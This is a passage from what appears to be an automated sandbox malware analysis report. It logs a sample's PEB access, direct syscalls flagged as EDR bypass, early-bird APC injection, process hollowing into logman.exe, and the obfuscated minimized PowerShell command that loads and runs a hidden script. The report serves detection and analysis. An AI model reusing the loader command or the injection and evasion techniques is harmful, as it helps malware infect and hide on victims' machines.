            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212AEB1D mov eax, dword ptr fs:[00000030h]11_2_212AEB1D
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212AEB1D mov eax, dword ptr fs:[00000030h]11_2_212AEB1D
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212AEB1D mov eax, dword ptr fs:[00000030h]11_2_212AEB1D
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2122CB7E mov eax, dword ptr fs:[00000030h]11_2_2122CB7E
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212E4B4B mov eax, dword ptr fs:[00000030h]11_2_212E4B4B
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212E4B4B mov eax, dword ptr fs:[00000030h]11_2_212E4B4B
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21302B57 mov eax, dword ptr fs:[00000030h]11_2_21302B57
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21302B57 mov eax, dword ptr fs:[00000030h]11_2_21302B57
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21302B57 mov eax, dword ptr fs:[00000030h]11_2_21302B57
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21302B57 mov eax, dword ptr fs:[00000030h]11_2_21302B57
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212C6B40 mov eax, dword ptr fs:[00000030h]11_2_212C6B40
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212C6B40 mov eax, dword ptr fs:[00000030h]11_2_212C6B40
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212FAB40 mov eax, dword ptr fs:[00000030h]11_2_212FAB40
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212D8B42 mov eax, dword ptr fs:[00000030h]11_2_212D8B42
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21228B50 mov eax, dword ptr fs:[00000030h]11_2_21228B50
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212DEB50 mov eax, dword ptr fs:[00000030h]11_2_212DEB50
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21240BBE mov eax, dword ptr fs:[00000030h]11_2_21240BBE
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21240BBE mov eax, dword ptr fs:[00000030h]11_2_21240BBE
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212E4BB0 mov eax, dword ptr fs:[00000030h]11_2_212E4BB0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212E4BB0 mov eax, dword ptr fs:[00000030h]11_2_212E4BB0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21238BF0 mov eax, dword ptr fs:[00000030h]11_2_21238BF0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21238BF0 mov eax, dword ptr fs:[00000030h]11_2_21238BF0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21238BF0 mov eax, dword ptr fs:[00000030h]11_2_21238BF0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2125EBFC mov eax, dword ptr fs:[00000030h]11_2_2125EBFC
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212BCBF0 mov eax, dword ptr fs:[00000030h]11_2_212BCBF0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21250BCB mov eax, dword ptr fs:[00000030h]11_2_21250BCB
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21250BCB mov eax, dword ptr fs:[00000030h]11_2_21250BCB
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21250BCB mov eax, dword ptr fs:[00000030h]11_2_21250BCB
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21230BCD mov eax, dword ptr fs:[00000030h]11_2_21230BCD
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21230BCD mov eax, dword ptr fs:[00000030h]11_2_21230BCD
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21230BCD mov eax, dword ptr fs:[00000030h]11_2_21230BCD
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212DEBD0 mov eax, dword ptr fs:[00000030h]11_2_212DEBD0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126CA24 mov eax, dword ptr fs:[00000030h]11_2_2126CA24
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2125EA2E mov eax, dword ptr fs:[00000030h]11_2_2125EA2E
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21254A35 mov eax, dword ptr fs:[00000030h]11_2_21254A35
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21254A35 mov eax, dword ptr fs:[00000030h]11_2_21254A35
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126CA38 mov eax, dword ptr fs:[00000030h]11_2_2126CA38
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212BCA11 mov eax, dword ptr fs:[00000030h]11_2_212BCA11
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126CA6F mov eax, dword ptr fs:[00000030h]11_2_2126CA6F
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126CA6F mov eax, dword ptr fs:[00000030h]11_2_2126CA6F
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126CA6F mov eax, dword ptr fs:[00000030h]11_2_2126CA6F
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212DEA60 mov eax, dword ptr fs:[00000030h]11_2_212DEA60
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212ACA72 mov eax, dword ptr fs:[00000030h]11_2_212ACA72
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212ACA72 mov eax, dword ptr fs:[00000030h]11_2_212ACA72
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21236A50 mov eax, dword ptr fs:[00000030h]11_2_21236A50
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21236A50 mov eax, dword ptr fs:[00000030h]11_2_21236A50
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21236A50 mov eax, dword ptr fs:[00000030h]11_2_21236A50
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21236A50 mov eax, dword ptr fs:[00000030h]11_2_21236A50
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21236A50 mov eax, dword ptr fs:[00000030h]11_2_21236A50
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21236A50 mov eax, dword ptr fs:[00000030h]11_2_21236A50
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21236A50 mov eax, dword ptr fs:[00000030h]11_2_21236A50
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21240A5B mov eax, dword ptr fs:[00000030h]11_2_21240A5B
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21240A5B mov eax, dword ptr fs:[00000030h]11_2_21240A5B
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21238AA0 mov eax, dword ptr fs:[00000030h]11_2_21238AA0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21238AA0 mov eax, dword ptr fs:[00000030h]11_2_21238AA0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21286AA4 mov eax, dword ptr fs:[00000030h]11_2_21286AA4
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2123EA80 mov eax, dword ptr fs:[00000030h]11_2_2123EA80
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2123EA80 mov eax, dword ptr fs:[00000030h]11_2_2123EA80
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2123EA80 mov eax, dword ptr fs:[00000030h]11_2_2123EA80
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2123EA80 mov eax, dword ptr fs:[00000030h]11_2_2123EA80
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2123EA80 mov eax, dword ptr fs:[00000030h]11_2_2123EA80
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2123EA80 mov eax, dword ptr fs:[00000030h]11_2_2123EA80
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2123EA80 mov eax, dword ptr fs:[00000030h]11_2_2123EA80
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2123EA80 mov eax, dword ptr fs:[00000030h]11_2_2123EA80
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2123EA80 mov eax, dword ptr fs:[00000030h]11_2_2123EA80
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21304A80 mov eax, dword ptr fs:[00000030h]11_2_21304A80
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21268A90 mov edx, dword ptr fs:[00000030h]11_2_21268A90
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126AAEE mov eax, dword ptr fs:[00000030h]11_2_2126AAEE
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126AAEE mov eax, dword ptr fs:[00000030h]11_2_2126AAEE
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21286ACC mov eax, dword ptr fs:[00000030h]11_2_21286ACC
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21286ACC mov eax, dword ptr fs:[00000030h]11_2_21286ACC
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21286ACC mov eax, dword ptr fs:[00000030h]11_2_21286ACC
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21230AD0 mov eax, dword ptr fs:[00000030h]11_2_21230AD0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21264AD0 mov eax, dword ptr fs:[00000030h]11_2_21264AD0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Early bird code injection technique detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Users\user\AppData\Local\Temp\Versificator.exeJump to behavior
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeNtQueryVolumeInformationFile: Direct from: 0x776D2F2CJump to behavior
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeNtQuerySystemInformation: Direct from: 0x776D48CCJump to behavior
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeNtAllocateVirtualMemory: Direct from: 0x776D48ECJump to behavior
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeNtOpenSection: Direct from: 0x776D2E0CJump to behavior
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeNtAllocateVirtualMemory: Direct from: 0x776D2BECJump to behavior
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeNtQueryInformationProcess: Direct from: 0x776D2C26Jump to behavior
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeNtResumeThread: Direct from: 0x776D2FBCJump to behavior
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeNtWriteVirtualMemory: Direct from: 0x776D490CJump to behavior
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeNtCreateUserProcess: Direct from: 0x776D371CJump to behavior
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeNtClose: Direct from: 0x776D2B6C
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeNtAllocateVirtualMemory: Direct from: 0x776D3C9CJump to behavior
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeNtSetInformationThread: Direct from: 0x776C63F9Jump to behavior
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeNtQueryAttributesFile: Direct from: 0x776D2E6CJump to behavior
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeNtReadVirtualMemory: Direct from: 0x776D2E8CJump to behavior
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeNtResumeThread: Direct from: 0x776D36ACJump to behavior
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeNtMapViewOfSection: Direct from: 0x776D2D1CJump to behavior
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeNtWriteVirtualMemory: Direct from: 0x776D2E3CJump to behavior
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeNtCreateMutant: Direct from: 0x776D35CCJump to behavior
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeNtAllocateVirtualMemory: Direct from: 0x776D2BFCJump to behavior
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeNtDelayExecution: Direct from: 0x776D2DDCJump to behavior
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeNtProtectVirtualMemory: Direct from: 0x776C7B2EJump to behavior
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeNtQuerySystemInformation: Direct from: 0x776D2DFCJump to behavior
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeNtReadFile: Direct from: 0x776D2ADCJump to behavior
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeNtCreateFile: Direct from: 0x776D2FECJump to behavior
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeNtOpenFile: Direct from: 0x776D2DCCJump to behavior
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeNtOpenKeyEx: Direct from: 0x776D2B9CJump to behavior
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeNtNotifyChangeKey: Direct from: 0x776D3C2CJump to behavior
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeNtSetInformationProcess: Direct from: 0x776D2C5CJump to behavior
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeNtProtectVirtualMemory: Direct from: 0x776D2F9CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeSection loaded: NULL target: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeSection loaded: NULL target: C:\Windows\SysWOW64\logman.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\logman.exeSection loaded: NULL target: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\logman.exeSection loaded: NULL target: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe protection: execute and read and writeJump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Users\user\AppData\Local\Temp\Versificator.exeJump to behavior
            Sample uses process hollowing technique
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Users\user\AppData\Local\Temp\Versificator.exe base address: 400000Jump to behavior
            Writes to foreign memory regions
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Users\user\AppData\Local\Temp\Versificator.exe base: 1660000Jump to behavior
            Source: C:\Users\user\Desktop\textless.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Initialforkortelse28=gc -Raw 'C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Skoledrenge227\cacodemoniac.Pro';$forminate=$Initialforkortelse28.SubString(54637,3);.$forminate($Initialforkortelse28)"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Versificator.exe "C:\Users\user~1\AppData\Local\Temp\Versificator.exe"Jump to behavior
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeProcess created: C:\Windows\SysWOW64\logman.exe "C:\Windows\SysWOW64\logman.exe"Jump to behavior
            Source: C:\Users\user\Desktop\textless.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$initialforkortelse28=gc -raw 'c:\users\user\appdata\roaming\fyldepenneblkkets\fremtoning\skoledrenge227\cacodemoniac.pro';$forminate=$initialforkortelse28.substring(54637,3);.$forminate($initialforkortelse28)"
            Source: C:\Users\user\Desktop\textless.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$initialforkortelse28=gc -raw 'c:\users\user\appdata\roaming\fyldepenneblkkets\fremtoning\skoledrenge227\cacodemoniac.pro';$forminate=$initialforkortelse28.substring(54637,3);.$forminate($initialforkortelse28)"Jump to behavior
            Source: 0ogHncCUa.exe, 0000000E.00000002.2118858292.0000000001420000.00000002.00000001.00040000.00000000.sdmp, 0ogHncCUa.exe, 0000000E.00000000.1931804743.0000000001420000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: 0ogHncCUa.exe, 0000000E.00000002.2118858292.0000000001420000.00000002.00000001.00040000.00000000.sdmp, 0ogHncCUa.exe, 0000000E.00000000.1931804743.0000000001420000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: 0ogHncCUa.exe, 0000000E.00000002.2118858292.0000000001420000.00000002.00000001.00040000.00000000.sdmp, 0ogHncCUa.exe, 0000000E.00000000.1931804743.0000000001420000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: 0ogHncCUa.exe, 0000000E.00000002.2118858292.0000000001420000.00000002.00000001.00040000.00000000.sdmp, 0ogHncCUa.exe, 0000000E.00000000.1931804743.0000000001420000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
